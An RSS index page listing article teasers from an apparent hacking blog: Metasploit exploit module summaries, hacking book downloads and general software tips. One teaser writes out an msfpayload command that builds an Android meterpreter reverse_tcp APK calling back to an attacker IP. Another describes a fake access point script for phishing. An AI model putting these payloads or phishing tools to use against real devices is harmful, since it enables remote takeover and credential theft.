Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Browsing all 1812 articles
Browse latest View live

Image may be NSFW.
Clik here to view.

Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

This module exploits vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP...

View Article


Image may be NSFW.
Clik here to view.

How to Send Encrypted Mail through Gmail (Secure Gmail by Streak)

Secure Gmail encrypts and decrypts emails you send in Gmail. This happens all on your machine, and the unencrypted text never reaches Google servers. This is useful if you don't want anyone but the...

View Article


Image may be NSFW.
Clik here to view.

How to Broadcast YouTube Video in Remote System

This module will broadcast a Youtube video on all compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID datastore option is the "v" parameter...

View Article

Image may be NSFW.
Clik here to view.

Hack Remote PC Using Adobe Reader ToolButton Use After Free

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback...

View Article

Image may be NSFW.
Clik here to view.

Hacking Raspberry Pi 2013

Download

View Article


Image may be NSFW.
Clik here to view.

Hack Remote PC Using Real Networks RealPlayer Version Attribute Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by improper bounds checking of the version and encoding attributes...

View Article

Image may be NSFW.
Clik here to view.

Hack Remote Windows 7 PC Using IBM Forms Viewer Unicode Buffer Overflow

This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long...

View Article

Image may be NSFW.
Clik here to view.

Email spoofing: The story of “Congratulations you have won a lottery” like...

Mail vs E-mailBack in old days when internet was not so common, we had to rely only on the postal/courier services. The only thing that bugs me about the traditional mail is their speed. This is when...

View Article


Image may be NSFW.
Clik here to view.

Remotely Scan Malware/Virus in Victim PC with Metasploit

This module will check a file for malware on VirusTotal based on the checksum.Exploit TargetsWindows 7Windows XPRequirementAttacker: Kali LinuxVictim PC: Windows 7 Open Kali Linux terminal type...

View Article


Image may be NSFW.
Clik here to view.

Penetration Testing Procedures & Methodologies

DownloadPassword: www.hackingarticles.in

View Article

Image may be NSFW.
Clik here to view.

Best of VLC Media Player Tricks (Part 1)

How to Cut the Audio and Video using VLC Player Open the VLC media player. Go to the menu bar .From the View tab, select Advanced Controls.We can see the Record button in the left bottom of the player...

View Article

Image may be NSFW.
Clik here to view.

Wireshark 101: Essential Skills for Network Analysis

Download

View Article

Image may be NSFW.
Clik here to view.

How to Know when people open your email with Google Analytics

Open your Gmail account and compose your message and save in draft Now open this Google sheet and choose the Initialize option under the Email Tracker menuNow you’ll have to authorize the sheet to send...

View Article


Image may be NSFW.
Clik here to view.

Best of VLC Media Player Tricks (Part 2)

How to Play Multiple Video in VLCOpen the VLC media player.Go to the Tool Tabpresent in the menu bar of the media player, and then select Preferences.Open the Interface Settings then select Allow only...

View Article

Image may be NSFW.
Clik here to view.

Hack Android Phone with Metasploit in Kali Linux

Open Kali Linux Terminal and typemsfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk-p for payloadandroid/meterpreter/reverse_tcpLhost (IP address of...

View Article


Image may be NSFW.
Clik here to view.

LazyKali -script for Kali Linux

A bash script for when you feel lazy. Adds quite a few tools to Kali Linux.Bleeding Edge ReposAngryIP ScannerTerminatorXchatUnicornscanNautilus Open...

View Article

Image may be NSFW.
Clik here to view.

How to Fix Disk Drive and Recover Data from Suddenly Became RAW

When attempting to access the drive in Windows you may see a message asking you to you need to format the disk in Drive E: before you can use itAfter installing it on your computer, choose Complete...

View Article


Image may be NSFW.
Clik here to view.

PwnSTAR: Pwn SofT Ap scRipt

A bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing. It can act as multi-client...

View Article

Image may be NSFW.
Clik here to view.

Hacking with Kali: Practical Penetration Testing Techniques

DownloadPassword: www.hackingarticles.in

View Article

Image may be NSFW.
Clik here to view.

Cyber Warfare: Techniques, Tactics and Tools for Security Practitioners...

Downloadpassword is www.hackingarticles.in

View Article
Browsing all 1812 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>